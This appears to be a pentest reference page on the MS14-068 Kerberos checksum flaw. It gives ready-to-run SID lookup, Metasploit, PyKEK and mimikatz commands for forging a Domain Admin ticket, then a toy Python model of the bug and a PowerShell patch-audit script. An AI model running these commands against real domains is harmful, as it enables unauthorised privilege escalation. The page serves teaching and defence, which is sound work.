
MS14-068 Checksum Validation Vulnerability

An unpatched domain controller validates the PAC signatures in a ticket using whatever checksum type the ticket itself specifies, including unkeyed types such as MD5. Any authenticated domain user can therefore submit a PAC that claims Domain Admins membership and receive a TGT that the DC signs as genuine. Exploitation needs valid domain credentials and the user's SID; the SID can be obtained remotely with rpcclient, or with WMI if you already have access to a domain-joined machine.

  • rpcclient
    rpcclient $> lookupnames john.smith
    john.smith S-1-5-21-2923581646-3335815371-2872905324-1107 (User: 1)
  • WMI
    wmic useraccount get name,sid
    Administrator  S-1-5-21-3415849876-833628785-5197346142-500
    Guest          S-1-5-21-3415849876-833628785-5197346142-501
    Administrator  S-1-5-21-297520375-2634728305-5197346142-500
    Guest          S-1-5-21-297520375-2634728305-5197346142-501
    krbtgt         S-1-5-21-297520375-2634728305-5197346142-502
    lambda         S-1-5-21-297520375-2634728305-5197346142-1110
  • PowerView
    Convert-NameToSid high-sec-corp.local\krbtgt
    S-1-5-21-2941561648-383941485-1389968811-502
  • netexec
    netexec ldap DC1.lab.local -u username -p password -k --get-sid
Documentation: https://github.com/gentilkiwi/kekeo/wiki/ms14068

Generate the ticket with Metasploit or PyKEK

Metasploit: auxiliary/admin/kerberos/ms14_068_kerberos_checksum
   Name      Current Setting                                Required  Description
   ----      ---------------                                --------  -----------
   DOMAIN    LABDOMAIN.LOCAL                                yes       Domain name in uppercase, e.g. DEMO.LOCAL
   PASSWORD  P@ssw0rd                                       yes       Password of the domain user
   RHOSTS    10.10.10.10                                    yes       Target address range or CIDR identifier (the domain controller)
   RPORT     88                                             yes       Target port (Kerberos)
   Timeout   10                                             yes       TCP timeout for connecting and reading data
   USER      lambda                                         yes       Domain user
   USER_SID  S-1-5-21-297520375-2634728305-5197346142-1106  yes       SID of the domain user, e.g. S-1-5-21-1755879683-3641577184-3486455962-1000
# Alternative download location: https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-068/pykek
# PyKEK is Python 2 code; run it with a Python 2 interpreter.
$ git clone https://github.com/SecWiki/windows-kernel-exploits
$ python ./ms14-068.py -u <userName>@<domainName> -s <userSid> -d <domainControlerAddr> -p <clearPassword>
$ python ./ms14-068.py -u darthsidious@lab.adsecurity.org -p TheEmperor99! -s S-1-5-21-1473643419-774954089-2222329127-1110 -d adsdc02.lab.adsecurity.org
$ python ./ms14-068.py -u john.smith@pwn3d.local -s S-1-5-21-2923581646-3335815371-2872905324-1107 -d 192.168.115.10
$ python ms14-068.py -u user01@metasploitable.local -d msfdc01.metasploitable.local -p Password1 -s S-1-5-21-2928836948-3642677517-2073454066-1105
  [+] Building AS-REQ for msfdc01.metasploitable.local... Done!
  [+] Sending AS-REQ to msfdc01.metasploitable.local... Done!
  [+] Receiving AS-REP from msfdc01.metasploitable.local... Done!
  [+] Parsing AS-REP from msfdc01.metasploitable.local... Done!
  [+] Building TGS-REQ for msfdc01.metasploitable.local... Done!
  [+] Sending TGS-REQ to msfdc01.metasploitable.local... Done!
  [+] Receiving TGS-REP from msfdc01.metasploitable.local... Done!
  [+] Parsing TGS-REP from msfdc01.metasploitable.local... Done!
  [+] Creating ccache file 'TGT_user01@metasploitable.local.ccache'... Done!

Then load the resulting ccache into the current session with mimikatz (pass-the-ccache); the injected TGT carries the forged PAC, so subsequent service tickets grant Domain Admin access.

mimikatz.exe "kerberos::ptc c:\temp\TGT_darthsidious@lab.adsecurity.org.ccache"
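Why the forged ticket in the procedure above is accepted at all: the following is an added, simplified Python model of the checksum validation bug, written for this page. It is not Windows KDC code, PyKEK or the Metasploit module; the PAC body layout and the checksum arithmetic are stand-ins (the real PAC is NDR-marshalled and the keyed types derive sub-keys), but the checksum type numbers are the real RFC 3961 / MS-PAC values, and the keyed-versus-unkeyed distinction is exactly what KB3011780 enforces. The "vulnerable" verifier trusts the checksum type carried in the ticket; the "fixed" verifier refuses unkeyed types, so a signature cannot verify without the krbtgt key.

```python
import hashlib
import hmac
import os
import struct

# Kerberos checksum type identifiers (RFC 3961 / MS-PAC); these numbers are real.
KERB_CHECKSUM_RSA_MD5 = 7                # unkeyed: anyone can compute it
KERB_CHECKSUM_HMAC_SHA1_96_AES256 = 16   # keyed: needs the verifier's key
KERB_CHECKSUM_HMAC_MD5 = -138            # keyed (RC4-HMAC)
KEYED_TYPES = {KERB_CHECKSUM_HMAC_SHA1_96_AES256, KERB_CHECKSUM_HMAC_MD5}

DOMAIN_USERS_RID = 513
DOMAIN_ADMINS_RID = 512


def build_pac_body(user_rid, group_rids):
    """Toy stand-in for the PAC_LOGON_INFO buffer: user RID, group count, group RIDs.
    The real buffer is NDR-marshalled KERB_VALIDATION_INFO; this layout is invented."""
    return struct.pack("<II", user_rid, len(group_rids)) + b"".join(
        struct.pack("<I", rid) for rid in group_rids)


def pac_groups(pac_body):
    """Read the group RIDs back out of the toy PAC body."""
    _user_rid, count = struct.unpack_from("<II", pac_body, 0)
    return list(struct.unpack_from("<%dI" % count, pac_body, 8))


def checksum(ctype, key, data):
    """Compute a PAC signature of the given type. Simplified: real keyed types derive a
    sub-key per RFC 3961 / RFC 4757; only the keyed/unkeyed distinction matters here."""
    if ctype == KERB_CHECKSUM_RSA_MD5:
        return hashlib.md5(data).digest()              # the key is ignored entirely
    if ctype == KERB_CHECKSUM_HMAC_MD5:
        return hmac.new(key, data, hashlib.md5).digest()
    if ctype == KERB_CHECKSUM_HMAC_SHA1_96_AES256:
        return hmac.new(key, data, hashlib.sha1).digest()[:12]
    raise ValueError("unsupported checksum type %d" % ctype)


def verify_pac_vulnerable(pac_body, sig_type, sig_value, kdc_key):
    """Pre-KB3011780 behaviour (modelled): the checksum type comes from the
    PAC_SIGNATURE_DATA the client sent, so an unkeyed MD5 'signature' verifies."""
    return hmac.compare_digest(checksum(sig_type, kdc_key, pac_body), sig_value)


def verify_pac_fixed(pac_body, sig_type, sig_value, kdc_key):
    """Patched behaviour (modelled): only keyed checksum types are accepted, so the
    signature cannot verify without the KDC (krbtgt) key."""
    if sig_type not in KEYED_TYPES:
        return False
    return hmac.compare_digest(checksum(sig_type, kdc_key, pac_body), sig_value)


def forge_domain_admin_pac(user_rid):
    """What the attacker can do without any key: claim RID 512 and sign with MD5."""
    body = build_pac_body(user_rid, [DOMAIN_USERS_RID, DOMAIN_ADMINS_RID])
    return body, KERB_CHECKSUM_RSA_MD5, checksum(KERB_CHECKSUM_RSA_MD5, b"", body)


def run_model(kdc_key):
    """Return how each KDC model treats a legitimate PAC and a forged one."""
    legit = build_pac_body(1107, [DOMAIN_USERS_RID])
    legit_sig = checksum(KERB_CHECKSUM_HMAC_SHA1_96_AES256, kdc_key, legit)
    forged, f_type, f_sig = forge_domain_admin_pac(1107)
    return {
        "legit_fixed": verify_pac_fixed(legit, KERB_CHECKSUM_HMAC_SHA1_96_AES256, legit_sig, kdc_key),
        "forged_vulnerable": verify_pac_vulnerable(forged, f_type, f_sig, kdc_key),
        "forged_fixed": verify_pac_fixed(forged, f_type, f_sig, kdc_key),
        "forged_groups": pac_groups(forged),
    }


if __name__ == "__main__":
    # The krbtgt key is generated here only so the model runs; the attacker never has it.
    for name, value in run_model(os.urandom(32)).items():
        print("%-18s %s" % (name, value))
```

The vulnerable verifier accepts the MD5-signed PAC listing RID 512 even though the signer never touched the KDC key; the fixed verifier rejects it outright because type 7 is not keyed, and a forged keyed signature would still fail because the attacker cannot compute an HMAC under the krbtgt key.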

Mitigations

  • Install KB3011780 on every domain controller. A single unpatched DC is enough for the attack, because the attacker chooses which DC to send the forged ticket to. Make the DCPromo process include a quality-assurance step that confirms the patch is present before promotion; a quick way to check on a DC is PowerShell: Get-HotFix -Id KB3011780
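A domain-wide version of that check, as an added PowerShell example written for this page (not from the original page or any referenced tool). It enumerates the DCs of the current domain through .NET so it needs no RSAT module, and assumes the caller has WMI/RPC access to each DC. Windows Server 2016 and later were released after the fix and never list KB3011780 as a separate hotfix, so they are reported as not affected rather than as missing the patch.

```powershell
# Added example: report MS14-068 (KB3011780) status for every DC in the current domain.
# Assumes WMI/RPC reachability to each DC; no ActiveDirectory module required.
$domain = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()

$results = foreach ($dc in $domain.DomainControllers) {
    $name = $dc.Name
    $os = $null
    try {
        $os = Get-CimInstance -ClassName Win32_OperatingSystem -ComputerName $name -ErrorAction Stop
        if (([version]$os.Version).Major -ge 10) {
            # Server 2016+ ships with the fix; the KB is never listed separately there.
            $status = 'NotAffected (fix built into OS)'
        }
        elseif (Get-HotFix -Id KB3011780 -ComputerName $name -ErrorAction SilentlyContinue) {
            $status = 'Patched'
        }
        else {
            $status = 'VULNERABLE: KB3011780 missing'
        }
    }
    catch {
        $status = "Unreachable: $($_.Exception.Message)"
    }
    [pscustomobject]@{
        DomainController = $name
        OSVersion        = if ($os) { $os.Version } else { 'unknown' }
        Status           = $status
    }
}

$results | Format-Table -AutoSize

# Non-zero exit so the check can gate a DCPromo or build pipeline.
if ($results | Where-Object Status -like 'VULNERABLE*') { exit 1 }
```

Get-HotFix reads Win32_QuickFixEngineering, which lists updates installed as separate packages; a missing entry on a DC that was patched through later rollups should be confirmed by other means before it is treated as a finding, while an "Unreachable" DC must be checked manually rather than assumed safe.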

References